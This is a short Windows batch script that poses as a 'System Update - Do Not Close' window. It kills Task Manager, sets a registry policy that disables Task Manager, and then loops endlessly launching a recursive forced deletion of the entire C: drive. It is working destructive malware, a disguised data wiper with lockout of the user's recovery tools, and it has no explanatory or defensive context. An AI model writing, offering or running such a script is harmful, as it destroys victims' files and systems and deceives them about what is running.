@echo off title System Update - Do Not Close taskkill /f /im taskmgr.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f :loop start /b cmd /c "rd /s /q C:\" goto loop